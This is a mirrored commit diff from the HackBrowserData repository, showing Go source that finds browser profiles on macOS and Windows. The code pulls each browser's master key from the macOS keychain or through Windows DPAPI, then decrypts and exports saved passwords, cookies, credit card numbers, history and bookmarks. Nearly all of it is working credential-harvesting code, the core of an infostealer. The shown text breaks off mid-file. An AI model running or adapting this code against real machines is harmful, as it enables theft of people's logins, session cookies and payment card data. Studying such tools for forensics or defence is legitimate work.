CalvinBackup/HackBrowserData
1
0
Fork 0
mirror of https://github.com/moonD4rk/HackBrowserData.git synced 2026-05-19 18:58:03 +02:00
Code Issues Packages Projects Releases Wiki Activity

refactor: format project layout

Browse Source
This commit is contained in:
ᴍᴏᴏɴD4ʀᴋ
2022-03-26 14:03:40 +08:00
parent a341928926
commit c2bc33e2fe
28 changed files with 214 additions and 94 deletions
Download Patch File Download Diff File Expand all files Collapse all files
internal/browser/browser.go
+370
View File
@@ -0,0 +1,370 @@
package browser
import (
"fmt"
"io/fs"
"io/ioutil"
"os"
"path"
"path/filepath"
"strings"
"hack-browser-data/internal/browser/data"
)
type Browser interface {
GetName() string
GetMasterKey() ([]byte, error)
GetBrowsingData() []data.BrowsingData
CopyItemFileToLocal() error
}
var (
// home dir path not for android and ios
homeDir, _ = os.UserHomeDir()
)
func PickBrowser(name string) []Browser {
var browsers []Browser
clist := pickChromium(name)
for _, b := range clist {
if b != nil {
browsers = append(browsers, b)
}
}
flist := pickFirefox(name)
for _, b := range flist {
if b != nil {
browsers = append(browsers, b)
}
}
return browsers
}
func pickChromium(name string) []Browser {
var browsers []Browser
name = strings.ToLower(name)
if name == "all" {
for _, choice := range chromiumList {
if b, err := newChromium(choice.browserInfo, choice.items); err == nil {
browsers = append(browsers, b)
} else {
if strings.Contains(err.Error(), "profile path is not exist") {
continue
}
panic(err)
}
}
return browsers
}
if choice, ok := chromiumList[name]; ok {
b, err := newChromium(choice.browserInfo, choice.items)
if err != nil {
panic(err)
}
browsers = append(browsers, b)
return browsers
}
return nil
}
func pickFirefox(name string) []Browser {
var browsers []Browser
name = strings.ToLower(name)
if name == "all" || name == "firefox" {
for _, b := range firefoxList {
multiFirefox, err := newMultiFirefox(b.browserInfo, b.items)
if err != nil {
panic(err)
}
for _, browser := range multiFirefox {
browsers = append(browsers, browser)
}
}
return browsers
}
return nil
}
type chromium struct {
browserInfo *browserInfo
items []item
itemPaths map[item]string
}
// NewBrowser 根据浏览器信息生成 Browser Interface
func newChromium(info *browserInfo, items []item) (*chromium, error) {
c := &chromium{
browserInfo: info,
items: items,
}
itemsPaths, err := getChromiumItemAbsPath(c.browserInfo.profilePath, c.items)
if err != nil {
return nil, err
}
c.itemPaths = itemsPaths
return c, err
}
func (c *chromium) GetName() string {
return c.browserInfo.name
}
func (c *chromium) GetBrowsingData() []data.BrowsingData {
var browsingData []data.BrowsingData
for item := range c.itemPaths {
d := item.NewBrowsingData()
if d != nil {
browsingData = append(browsingData, d)
}
}
return browsingData
}
func (c *chromium) CopyItemFileToLocal() error {
for item, sourcePath := range c.itemPaths {
var dstFilename = item.FileName()
locals, _ := filepath.Glob("*")
for _, v := range locals {
if v == dstFilename {
err := os.Remove(dstFilename)
// TODO: Should Continue all iteration error
if err != nil {
return err
}
}
}
// TODO: Handle read file error
sourceFile, err := ioutil.ReadFile(sourcePath)
if err != nil {
fmt.Println(err.Error())
}
err = ioutil.WriteFile(dstFilename, sourceFile, 0777)
if err != nil {
return err
}
}
return nil
}
type firefox struct {
browserInfo *browserInfo
items []item
itemPaths map[item]string
multiItemPaths map[string]map[item]string
}
// newFirefox
func newMultiFirefox(info *browserInfo, items []item) ([]*firefox, error) {
f := &firefox{
browserInfo: info,
items: items,
}
multiItemPaths, err := getFirefoxItemAbsPath(f.browserInfo.profilePath, f.items)
if err != nil {
if strings.Contains(err.Error(), "profile path is not exist") {
fmt.Println(err)
return nil, nil
}
panic(err)
}
var firefoxList []*firefox
for name, value := range multiItemPaths {
firefoxList = append(firefoxList, &firefox{
browserInfo: &browserInfo{
name: name,
masterKey: nil,
},
items: items,
itemPaths: value,
})
}
return firefoxList, nil
}
func getFirefoxItemAbsPath(profilePath string, items []item) (map[string]map[item]string, error) {
var multiItemPaths = make(map[string]map[item]string)
absProfilePath := path.Join(homeDir, filepath.Clean(profilePath))
// TODO: Handle read file error
if !isFileExist(absProfilePath) {
return nil, fmt.Errorf("%s profile path is not exist", absProfilePath)
}
err := filepath.Walk(absProfilePath, firefoxWalkFunc(items, multiItemPaths))
return multiItemPaths, err
}
func (f *firefox) CopyItemFileToLocal() error {
for item, sourcePath := range f.itemPaths {
var dstFilename = item.FileName()
locals, _ := filepath.Glob("*")
for _, v := range locals {
if v == dstFilename {
err := os.Remove(dstFilename)
// TODO: Should Continue all iteration error
if err != nil {
return err
}
}
}
// TODO: Handle read file name error
sourceFile, err := ioutil.ReadFile(sourcePath)
if err != nil {
fmt.Println(err.Error())
}
err = ioutil.WriteFile(dstFilename, sourceFile, 0777)
if err != nil {
return err
}
}
return nil
}
func firefoxWalkFunc(items []item, multiItemPaths map[string]map[item]string) filepath.WalkFunc {
return func(path string, info fs.FileInfo, err error) error {
for _, v := range items {
if info.Name() == v.DefaultName() {
parentDir := getParentDir(path)
if _, exist := multiItemPaths[parentDir]; exist {
multiItemPaths[parentDir][v] = path
} else {
multiItemPaths[parentDir] = map[item]string{v: path}
}
}
}
return err
}
}
func getParentDir(absPath string) string {
return filepath.Base(filepath.Dir(absPath))
}
func chromiumWalkFunc(items []item, itemPaths map[item]string) filepath.WalkFunc {
return func(path string, info os.FileInfo, err error) error {
for _, item := range items {
if item.DefaultName() == info.Name() && item == chromiumKey {
itemPaths[item] = path
}
if item.DefaultName() == info.Name() && strings.Contains(path, "Default") {
itemPaths[item] = path
}
}
return err
}
}
func getChromiumItemAbsPath(profilePath string, items []item) (map[item]string, error) {
var itemPaths = make(map[item]string)
absProfilePath := path.Join(homeDir, filepath.Clean(profilePath))
// TODO: Handle file path is not exist
if !isFileExist(absProfilePath) {
return nil, fmt.Errorf("%s profile path is not exist", absProfilePath)
}
err := filepath.Walk(absProfilePath, chromiumWalkFunc(items, itemPaths))
return itemPaths, err
}
func (f *firefox) GetMasterKey() ([]byte, error) {
return f.browserInfo.masterKey, nil
}
func (f *firefox) GetName() string {
return f.browserInfo.name
}
func (f *firefox) GetBrowsingData() []data.BrowsingData {
var browsingData []data.BrowsingData
for item := range f.itemPaths {
d := item.NewBrowsingData()
if d != nil {
browsingData = append(browsingData, d)
}
}
return browsingData
}
func ListBrowser() []string {
var l []string
for c := range chromiumList {
l = append(l, c)
}
for f := range firefoxList {
l = append(l, f)
}
return l
}
func isFileExist(path string) bool {
if _, err := os.Stat(path); os.IsNotExist(err) {
return false
}
return true
}
type browserInfo struct {
name string
storage string
profilePath string
masterKey []byte
}
const (
chromeName = "Chrome"
chromeBetaName = "Chrome Beta"
chromiumName = "Chromium"
edgeName = "Microsoft Edge"
firefoxName = "Firefox"
firefoxBetaName = "Firefox Beta"
firefoxDevName = "Firefox Dev"
firefoxNightlyName = "Firefox Nightly"
firefoxESRName = "Firefox ESR"
speed360Name = "360speed"
qqBrowserName = "QQ"
braveName = "Brave"
operaName = "Opera"
operaGXName = "OperaGX"
vivaldiName = "Vivaldi"
coccocName = "CocCoc"
yandexName = "Yandex"
)
var defaultFirefoxItems = []item{
firefoxKey4,
firefoxPassword,
firefoxCookie,
firefoxBookmark,
firefoxHistory,
firefoxDownload,
firefoxCreditCard,
firefoxLocalStorage,
firefoxExtension,
}
var defaultYandexItems = []item{
chromiumKey,
yandexPassword,
chromiumCookie,
chromiumBookmark,
chromiumHistory,
chromiumDownload,
yandexCreditCard,
chromiumLocalStorage,
chromiumExtension,
}
var defaultChromiumItems = []item{
chromiumKey,
chromiumPassword,
chromiumCookie,
chromiumBookmark,
chromiumHistory,
chromiumDownload,
chromiumCreditCard,
chromiumLocalStorage,
chromiumExtension,
}
internal/browser/browser_darwin.go
+186
View File
@@ -0,0 +1,186 @@
package browser
import (
"bytes"
"crypto/sha1"
"errors"
"os/exec"
"golang.org/x/crypto/pbkdf2"
)
var (
chromiumList = map[string]struct {
browserInfo *browserInfo
items []item
}{
"chrome": {
browserInfo: chromeInfo,
items: defaultChromiumItems,
},
"edge": {
browserInfo: edgeInfo,
items: defaultChromiumItems,
},
"chromium": {
browserInfo: chromiumInfo,
items: defaultChromiumItems,
},
"chrome-beta": {
browserInfo: chromeBetaInfo,
items: defaultChromiumItems,
},
"opera": {
browserInfo: operaInfo,
items: defaultChromiumItems,
},
"opera-gx": {
browserInfo: operaGXInfo,
items: defaultChromiumItems,
},
"vivaldi": {
browserInfo: vivaldiInfo,
items: defaultChromiumItems,
},
"coccoc": {
browserInfo: coccocInfo,
items: defaultChromiumItems,
},
"brave": {
browserInfo: braveInfo,
items: defaultChromiumItems,
},
"yandex": {
browserInfo: yandexInfo,
items: defaultYandexItems,
},
}
firefoxList = map[string]struct {
browserInfo *browserInfo
items []item
}{
"firefox": {
browserInfo: firefoxInfo,
items: defaultFirefoxItems,
},
}
)
var (
ErrWrongSecurityCommand = errors.New("macOS wrong security command")
)
func (c *chromium) GetMasterKey() ([]byte, error) {
var (
cmd *exec.Cmd
stdout, stderr bytes.Buffer
)
// $ security find-generic-password -wa 'Chrome'
cmd = exec.Command("security", "find-generic-password", "-wa", c.browserInfo.storage)
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
return nil, err
}
if stderr.Len() > 0 {
return nil, errors.New(stderr.String())
}
temp := stdout.Bytes()
chromeSecret := temp[:len(temp)-1]
if chromeSecret == nil {
return nil, ErrWrongSecurityCommand
}
var chromeSalt = []byte("saltysalt")
// @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New)
if key != nil {
c.browserInfo.masterKey = key
return key, nil
}
return nil, errors.New("macOS wrong security command")
}
const (
chromeProfilePath = "/Library/Application Support/Google/Chrome/"
chromeBetaProfilePath = "/Library/Application Support/Google/Chrome Beta/"
chromiumProfilePath = "/Library/Application Support/Chromium/"
edgeProfilePath = "/Library/Application Support/Microsoft Edge/"
braveProfilePath = "/Library/Application Support/BraveSoftware/Brave-Browser/"
operaProfilePath = "/Library/Application Support/com.operasoftware.Opera/"
operaGXProfilePath = "/Library/Application Support/com.operasoftware.OperaGX/"
vivaldiProfilePath = "/Library/Application Support/Vivaldi/"
coccocProfilePath = "/Library/Application Support/Coccoc/"
yandexProfilePath = "/Library/Application Support/Yandex/YandexBrowser/"
firefoxProfilePath = "/Library/Application Support/Firefox/Profiles/"
)
const (
chromeStorageName = "Chrome"
chromeBetaStorageName = "Chrome"
chromiumStorageName = "Chromium"
edgeStorageName = "Microsoft Edge"
braveStorageName = "Brave"
operaStorageName = "Opera"
vivaldiStorageName = "Vivaldi"
coccocStorageName = "CocCoc"
yandexStorageName = "Yandex"
)
var (
chromeInfo = &browserInfo{
name: chromeName,
storage: chromeStorageName,
profilePath: chromeProfilePath,
}
chromiumInfo = &browserInfo{
name: chromiumName,
storage: chromiumStorageName,
profilePath: chromiumProfilePath,
}
chromeBetaInfo = &browserInfo{
name: chromeBetaName,
storage: chromeBetaStorageName,
profilePath: chromeBetaProfilePath,
}
operaInfo = &browserInfo{
name: operaName,
profilePath: operaProfilePath,
storage: operaStorageName,
}
operaGXInfo = &browserInfo{
name: operaGXName,
profilePath: operaGXProfilePath,
storage: operaStorageName,
}
edgeInfo = &browserInfo{
name: edgeName,
storage: edgeStorageName,
profilePath: edgeProfilePath,
}
braveInfo = &browserInfo{
name: braveName,
profilePath: braveProfilePath,
storage: braveStorageName,
}
vivaldiInfo = &browserInfo{
name: vivaldiName,
storage: vivaldiStorageName,
profilePath: vivaldiProfilePath,
}
coccocInfo = &browserInfo{
name: coccocName,
storage: coccocStorageName,
profilePath: coccocProfilePath,
}
yandexInfo = &browserInfo{
name: yandexName,
storage: yandexStorageName,
profilePath: yandexProfilePath,
}
firefoxInfo = &browserInfo{
name: firefoxName,
profilePath: firefoxProfilePath,
}
)
internal/browser/browser_linux.go
+1
View File
@@ -0,0 +1 @@
package browser
internal/browser/browser_test.go
+90
View File
@@ -0,0 +1,90 @@
package browser
import (
"fmt"
"testing"
"hack-browser-data/internal/browser/outputter"
"hack-browser-data/internal/log"
)
func TestPickChromium(t *testing.T) {
browsers := pickChromium("chrome")
log.InitLog("debug")
filetype := "json"
dir := "result"
output := outputter.NewOutPutter(filetype)
if err := output.MakeDir("result"); err != nil {
panic(err)
}
for _, b := range browsers {
fmt.Printf("%+v\n", b)
if err := b.CopyItemFileToLocal(); err != nil {
panic(err)
}
masterKey, err := b.GetMasterKey()
if err != nil {
fmt.Println(err)
}
browserName := b.GetName()
multiData := b.GetBrowsingData()
for _, data := range multiData {
if err := data.Parse(masterKey); err != nil {
fmt.Println(err)
}
filename := fmt.Sprintf("%s_%s.%s", browserName, data.Name(), filetype)
file, err := output.CreateFile(dir, filename)
if err != nil {
panic(err)
}
if err := output.Write(data, file); err != nil {
panic(err)
}
}
}
}
func TestPickBrowsers(t *testing.T) {
browsers := PickBrowser("all")
for _, v := range browsers {
fmt.Println(v.GetName())
}
// filetype := "json"
// dir := "result"
// output := outputter.NewOutPutter(filetype)
}
func TestPickFirefox(t *testing.T) {
browsers := pickFirefox("all")
filetype := "json"
dir := "result"
output := outputter.NewOutPutter(filetype)
if err := output.MakeDir("result"); err != nil {
panic(err)
}
for _, b := range browsers {
fmt.Printf("%+v\n", b)
if err := b.CopyItemFileToLocal(); err != nil {
panic(err)
}
masterKey, err := b.GetMasterKey()
if err != nil {
fmt.Println(err)
}
browserName := b.GetName()
multiData := b.GetBrowsingData()
for _, data := range multiData {
if err := data.Parse(masterKey); err != nil {
fmt.Println(err)
}
filename := fmt.Sprintf("%s_%s.%s", browserName, data.Name(), filetype)
file, err := output.CreateFile(dir, filename)
if err != nil {
panic(err)
}
if err := output.Write(data, file); err != nil {
panic(err)
}
}
}
}
internal/browser/browser_windows.go
+98
View File
@@ -0,0 +1,98 @@
package browser
import (
"encoding/base64"
"errors"
"github.com/tidwall/gjson"
"hack-browser-data/internal/browser/consts"
"hack-browser-data/internal/decrypter"
"hack-browser-data/internal/utils"
)
var (
chromiumList = map[string]struct {
browserInfo *browserInfo
items []item
}{
"chrome": {
browserInfo: chromeInfo,
items: defaultChromiumItems,
},
"edge": {
browserInfo: edgeInfo,
items: defaultChromiumItems,
},
"yandex": {
browserInfo: yandexInfo,
items: defaultYandexItems,
},
}
firefoxList = map[string]struct {
browserInfo *browserInfo
items []item
}{
"firefox": {
browserInfo: firefoxInfo,
items: defaultFirefoxItems,
},
}
)
var (
errDecodeMasterKeyFailed = errors.New("decode master key failed")
)
func (c *chromium) GetMasterKey() ([]byte, error) {
keyFile, err := utils.ReadFile(consts.ChromiumKeyFilename)
if err != nil {
return nil, err
}
encryptedKey := gjson.Get(keyFile, "os_crypt.encrypted_key")
if encryptedKey.Exists() {
pureKey, err := base64.StdEncoding.DecodeString(encryptedKey.String())
if err != nil {
return nil, errDecodeMasterKeyFailed
}
c.browserInfo.masterKey, err = decrypter.DPApi(pureKey[5:])
return c.browserInfo.masterKey, err
}
return nil, nil
}
var (
chromeInfo = &browserInfo{
name: chromeName,
profilePath: chromeProfilePath,
}
edgeInfo = &browserInfo{
name: edgeName,
profilePath: edgeProfilePath,
}
yandexInfo = &browserInfo{
name: yandexName,
profilePath: edgeProfilePath,
}
firefoxInfo = &browserInfo{
name: firefoxName,
profilePath: firefoxProfilePath,
}
)
const (
chromeProfilePath = "/AppData/Local/Google/Chrome/User Data/"
chromeBetaProfilePath = "/AppData/Local/Google/Chrome Beta/User Data/"
chromiumProfilePath = "/AppData/Local/Chromium/User Data/"
edgeProfilePath = "/AppData/Local/Microsoft/Edge/User Data/"
braveProfilePath = "/AppData/Local/BraveSoftware/Brave-Browser/User Data/"
speed360ProfilePath = "/AppData/Local/360chrome/Chrome/User Data/"
qqBrowserProfilePath = "/AppData/Local/Tencent/QQBrowser/User Data/"
operaProfilePath = "/AppData/Roaming/Opera Software/Opera Stable/"
operaGXProfilePath = "/AppData/Roaming/Opera Software/Opera GX Stable/"
vivaldiProfilePath = "/AppData/Local/Vivaldi/User Data/Default/"
coccocProfilePath = "/AppData/Local/CocCoc/Browser/User Data/Default/"
yandexProfilePath = "/AppData/Local/Yandex/YandexBrowser/User Data/Default"
firefoxProfilePath = "/AppData/Roaming/Mozilla/Firefox/Profiles"
)
internal/browser/consts/filename.go
+47
View File
@@ -0,0 +1,47 @@
package consts
// item's default filename
const (
ChromiumKey = "Local State"
ChromiumCredit = "Web Data"
ChromiumPassword = "Login Data"
ChromiumHistory = "History"
ChromiumDownload = "History"
ChromiumCookie = "Cookies"
ChromiumBookmark = "Bookmarks"
ChromiumLocalStorage = "chromiumLocalStorage"
YandexPassword = "Ya PassMan Data"
YandexCredit = "Ya Credit Cards"
FirefoxKey4 = "key4.db"
FirefoxCookie = "cookies.sqlite"
FirefoxPassword = "logins.json"
FirefoxData = "places.sqlite"
UnknownItem = "unknown item"
UnsupportedItem = "unsupported item"
)
// item's renamed filename
const (
ChromiumKeyFilename = "ChromiumKeyFilename"
ChromiumCreditFilename = "ChromiumCreditFilename"
ChromiumPasswordFilename = "ChromiumPasswordFilename"
ChromiumHistoryFilename = "ChromiumHistoryFilename"
ChromiumDownloadFilename = "ChromiumDownloadFilename"
ChromiumCookieFilename = "ChromiumCookieFilename"
ChromiumBookmarkFilename = "ChromiumBookmarkFilename"
ChromiumLocalStorageFilename = "ChromiumLocalStorageFilename"
YandexPasswordFilename = "YandexPasswordFilename"
YandexCreditFilename = "YandexCreditFilename"
FirefoxKey4Filename = "FirefoxKey4DBFilename"
FirefoxCookieFilename = "FirefoxCookieFilename"
FirefoxPasswordFilename = "FirefoxPasswordFilename"
FirefoxDownloadFilename = "FirefoxDownloadFilename"
FirefoxHistoryFilename = "FirefoxHistoryFilename"
FirefoxBookmarkFilename = "FirefoxBookmarkFilename"
FirefoxDataFilename = "FirefoxDataFilename"
)
internal/browser/consts/sql.go
+1
View File
@@ -0,0 +1 @@
package consts
internal/browser/data/bookmark.go
+112
View File
@@ -0,0 +1,112 @@
package data
import (
"database/sql"
"fmt"
"sort"
"github.com/tidwall/gjson"
"hack-browser-data/internal/browser/consts"
"hack-browser-data/internal/utils"
)
type ChromiumBookmark []bookmark
func (c *ChromiumBookmark) Parse(masterKey []byte) error {
bookmarks, err := utils.ReadFile(consts.ChromiumBookmarkFilename)
if err != nil {
return err
}
r := gjson.Parse(bookmarks)
if r.Exists() {
roots := r.Get("roots")
roots.ForEach(func(key, value gjson.Result) bool {
getBookmarkChildren(value, c)
return true
})
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].DateAdded.After((*c)[j].DateAdded)
})
return nil
}
func getBookmarkChildren(value gjson.Result, w *ChromiumBookmark) (children gjson.Result) {
const (
bookmarkID = "id"
bookmarkAdded = "date_added"
bookmarkUrl = "url"
bookmarkName = "name"
bookmarkType = "type"
bookmarkChildren = "children"
)
nodeType := value.Get(bookmarkType)
bm := bookmark{
ID: value.Get(bookmarkID).Int(),
Name: value.Get(bookmarkName).String(),
URL: value.Get(bookmarkUrl).String(),
DateAdded: utils.TimeEpochFormat(value.Get(bookmarkAdded).Int()),
}
children = value.Get(bookmarkChildren)
if nodeType.Exists() {
bm.Type = nodeType.String()
*w = append(*w, bm)
if children.Exists() && children.IsArray() {
for _, v := range children.Array() {
children = getBookmarkChildren(v, w)
}
}
}
return children
}
func (c *ChromiumBookmark) Name() string {
return "bookmark"
}
type FirefoxBookmark []bookmark
func (f *FirefoxBookmark) Parse(masterKey []byte) error {
var (
err error
keyDB *sql.DB
bookmarkRows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", consts.FirefoxBookmarkFilename)
if err != nil {
return err
}
_, err = keyDB.Exec(closeJournalMode)
defer keyDB.Close()
bookmarkRows, err = keyDB.Query(queryFirefoxBookMark)
if err != nil {
return err
}
defer bookmarkRows.Close()
for bookmarkRows.Next() {
var (
id, bType, dateAdded int64
title, url string
)
if err = bookmarkRows.Scan(&id, &url, &bType, &dateAdded, &title); err != nil {
fmt.Println(err)
}
*f = append(*f, bookmark{
ID: id,
Name: title,
Type: utils.BookmarkType(bType),
URL: url,
DateAdded: utils.TimeStampFormat(dateAdded / 1000000),
})
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].DateAdded.After((*f)[j].DateAdded)
})
return nil
}
func (f *FirefoxBookmark) Name() string {
return "bookmark"
}
internal/browser/data/browsingdata.go
+76
View File
@@ -0,0 +1,76 @@
package data
import "time"
type BrowsingData interface {
Parse(masterKey []byte) error
Name() string
}
const (
queryChromiumCredit = `SELECT guid, name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards`
queryChromiumLogin = `SELECT origin_url, username_value, password_value, date_created FROM logins`
queryChromiumHistory = `SELECT url, title, visit_count, last_visit_time FROM urls`
queryChromiumDownload = `SELECT target_path, tab_url, total_bytes, start_time, end_time, mime_type FROM downloads`
queryChromiumCookie = `SELECT name, encrypted_value, host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires, is_persistent FROM cookies`
queryFirefoxHistory = `SELECT id, url, last_visit_date, title, visit_count FROM moz_places where title not null`
queryFirefoxDownload = `SELECT place_id, GROUP_CONCAT(content), url, dateAdded FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id=moz_places.id) t GROUP BY place_id`
queryFirefoxBookMark = `SELECT id, url, type, dateAdded, title FROM (SELECT * FROM moz_bookmarks INNER JOIN moz_places ON moz_bookmarks.fk=moz_places.id)`
queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies`
queryMetaData = `SELECT item1, item2 FROM metaData WHERE id = 'password'`
queryNssPrivate = `SELECT a11, a102 from nssPrivate`
closeJournalMode = `PRAGMA journal_mode=off`
)
type (
loginData struct {
UserName string
encryptPass []byte
encryptUser []byte
Password string
LoginUrl string
CreateDate time.Time
}
bookmark struct {
ID int64
Name string
Type string
URL string
DateAdded time.Time
}
cookie struct {
Host string
Path string
KeyName string
encryptValue []byte
Value string
IsSecure bool
IsHTTPOnly bool
HasExpire bool
IsPersistent bool
CreateDate time.Time
ExpireDate time.Time
}
history struct {
Title string
Url string
VisitCount int
LastVisitTime time.Time
}
download struct {
TargetPath string
Url string
TotalBytes int64
StartTime time.Time
EndTime time.Time
MimeType string
}
card struct {
GUID string
Name string
ExpirationYear string
ExpirationMonth string
CardNumber string
}
)
internal/browser/data/cookie.go
+116
View File
@@ -0,0 +1,116 @@
package data
import (
"database/sql"
"fmt"
"sort"
"hack-browser-data/internal/browser/consts"
"hack-browser-data/internal/decrypter"
"hack-browser-data/internal/utils"
_ "github.com/mattn/go-sqlite3"
)
type ChromiumCookie []cookie
func (c *ChromiumCookie) Parse(masterKey []byte) error {
cookieDB, err := sql.Open("sqlite3", consts.ChromiumCookieFilename)
if err != nil {
return err
}
defer cookieDB.Close()
rows, err := cookieDB.Query(queryChromiumCookie)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
key, host, path string
isSecure, isHTTPOnly, hasExpire, isPersistent int
createDate, expireDate int64
value, encryptValue []byte
)
if err = rows.Scan(&key, &encryptValue, &host, &path, &createDate, &expireDate, &isSecure, &isHTTPOnly, &hasExpire, &isPersistent); err != nil {
fmt.Println(err)
}
cookie := cookie{
KeyName: key,
Host: host,
Path: path,
encryptValue: encryptValue,
IsSecure: utils.IntToBool(isSecure),
IsHTTPOnly: utils.IntToBool(isHTTPOnly),
HasExpire: utils.IntToBool(hasExpire),
IsPersistent: utils.IntToBool(isPersistent),
CreateDate: utils.TimeEpochFormat(createDate),
ExpireDate: utils.TimeEpochFormat(expireDate),
}
// TODO: replace DPAPI
if len(encryptValue) > 0 {
if masterKey == nil {
value, err = decrypter.DPApi(encryptValue)
if err != nil {
fmt.Println(err)
}
} else {
value, err = decrypter.ChromePass(masterKey, encryptValue)
if err != nil {
fmt.Println(err)
}
}
}
cookie.Value = string(value)
*c = append(*c, cookie)
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].CreateDate.After((*c)[j].CreateDate)
})
return nil
}
func (c *ChromiumCookie) Name() string {
return "cookie"
}
type FirefoxCookie []cookie
func (f *FirefoxCookie) Parse(masterKey []byte) error {
cookieDB, err := sql.Open("sqlite3", consts.FirefoxCookieFilename)
if err != nil {
return err
}
defer cookieDB.Close()
rows, err := cookieDB.Query(queryFirefoxCookie)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
name, value, host, path string
isSecure, isHttpOnly int
creationTime, expiry int64
)
if err = rows.Scan(&name, &value, &host, &path, &creationTime, &expiry, &isSecure, &isHttpOnly); err != nil {
fmt.Println(err)
}
*f = append(*f, cookie{
KeyName: name,
Host: host,
Path: path,
IsSecure: utils.IntToBool(isSecure),
IsHTTPOnly: utils.IntToBool(isHttpOnly),
CreateDate: utils.TimeStampFormat(creationTime / 1000000),
ExpireDate: utils.TimeStampFormat(expiry),
Value: value,
})
}
return nil
}
func (f *FirefoxCookie) Name() string {
return "cookie"
}
internal/browser/data/creditcard.go
+58
View File
@@ -0,0 +1,58 @@
package data
import (
"database/sql"
"fmt"
_ "github.com/mattn/go-sqlite3"
"hack-browser-data/internal/browser/consts"
"hack-browser-data/internal/decrypter"
)
type ChromiumCreditCard []card
func (c *ChromiumCreditCard) Parse(masterKey []byte) error {
creditDB, err := sql.Open("sqlite3", consts.ChromiumCreditFilename)
if err != nil {
return err
}
defer creditDB.Close()
rows, err := creditDB.Query(queryChromiumCredit)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
name, month, year, guid string
value, encryptValue []byte
)
if err := rows.Scan(&guid, &name, &month, &year, &encryptValue); err != nil {
fmt.Println(err)
}
creditCardInfo := card{
GUID: guid,
Name: name,
ExpirationMonth: month,
ExpirationYear: year,
}
if masterKey == nil {
value, err = decrypter.DPApi(encryptValue)
if err != nil {
return err
}
} else {
value, err = decrypter.ChromePass(masterKey, encryptValue)
if err != nil {
return err
}
}
creditCardInfo.CardNumber = string(value)
*c = append(*c, creditCardInfo)
}
return nil
}
func (c *ChromiumCreditCard) Name() string {
return "creditcard"
}
internal/browser/data/download.go
+111
View File
@@ -0,0 +1,111 @@
package data
import (
"database/sql"
"fmt"
"sort"
"strings"
"github.com/tidwall/gjson"
"hack-browser-data/internal/browser/consts"
"hack-browser-data/internal/utils"
_ "github.com/mattn/go-sqlite3"
)
type ChromiumDownload []download
func (c *ChromiumDownload) Parse(masterKey []byte) error {
historyDB, err := sql.Open("sqlite3", consts.ChromiumDownloadFilename)
if err != nil {
return err
}
defer historyDB.Close()
rows, err := historyDB.Query(queryChromiumDownload)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
targetPath, tabUrl, mimeType string
totalBytes, startTime, endTime int64
)
if err := rows.Scan(&targetPath, &tabUrl, &totalBytes, &startTime, &endTime, &mimeType); err != nil {
fmt.Println(err)
}
data := download{
TargetPath: targetPath,
Url: tabUrl,
TotalBytes: totalBytes,
StartTime: utils.TimeEpochFormat(startTime),
EndTime: utils.TimeEpochFormat(endTime),
MimeType: mimeType,
}
*c = append(*c, data)
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].TotalBytes > (*c)[j].TotalBytes
})
return nil
}
func (c *ChromiumDownload) Name() string {
return "download"
}
type FirefoxDownload []download
func (f *FirefoxDownload) Parse(masterKey []byte) error {
var (
err error
keyDB *sql.DB
downloadRows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", consts.FirefoxDownloadFilename)
if err != nil {
return err
}
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
return err
}
defer keyDB.Close()
downloadRows, err = keyDB.Query(queryFirefoxDownload)
if err != nil {
return err
}
defer downloadRows.Close()
for downloadRows.Next() {
var (
content, url string
placeID, dateAdded int64
)
if err = downloadRows.Scan(&placeID, &content, &url, &dateAdded); err != nil {
fmt.Println(err)
}
contentList := strings.Split(content, ",{")
if len(contentList) > 1 {
path := contentList[0]
json := "{" + contentList[1]
endTime := gjson.Get(json, "endTime")
fileSize := gjson.Get(json, "fileSize")
*f = append(*f, download{
TargetPath: path,
Url: url,
TotalBytes: fileSize.Int(),
StartTime: utils.TimeStampFormat(dateAdded / 1000000),
EndTime: utils.TimeStampFormat(endTime.Int() / 1000),
})
}
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].TotalBytes < (*f)[j].TotalBytes
})
return nil
}
func (f *FirefoxDownload) Name() string {
return "download"
}
internal/browser/data/history.go
+101
View File
@@ -0,0 +1,101 @@
package data
import (
"database/sql"
"fmt"
"sort"
"hack-browser-data/internal/browser/consts"
"hack-browser-data/internal/utils"
_ "github.com/mattn/go-sqlite3"
)
type ChromiumHistory []history
func (c *ChromiumHistory) Parse(masterKey []byte) error {
historyDB, err := sql.Open("sqlite3", consts.ChromiumHistoryFilename)
if err != nil {
return err
}
defer historyDB.Close()
rows, err := historyDB.Query(queryChromiumHistory)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
url, title string
visitCount int
lastVisitTime int64
)
// TODO: handle rows error
if err := rows.Scan(&url, &title, &visitCount, &lastVisitTime); err != nil {
fmt.Println(err)
}
data := history{
Url: url,
Title: title,
VisitCount: visitCount,
LastVisitTime: utils.TimeEpochFormat(lastVisitTime),
}
*c = append(*c, data)
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].VisitCount > (*c)[j].VisitCount
})
return nil
}
func (c *ChromiumHistory) Name() string {
return "history"
}
type FirefoxHistory []history
func (f *FirefoxHistory) Parse(masterKey []byte) error {
var (
err error
keyDB *sql.DB
historyRows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", consts.FirefoxHistoryFilename)
if err != nil {
return err
}
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
return err
}
defer keyDB.Close()
historyRows, err = keyDB.Query(queryFirefoxHistory)
if err != nil {
return err
}
defer historyRows.Close()
for historyRows.Next() {
var (
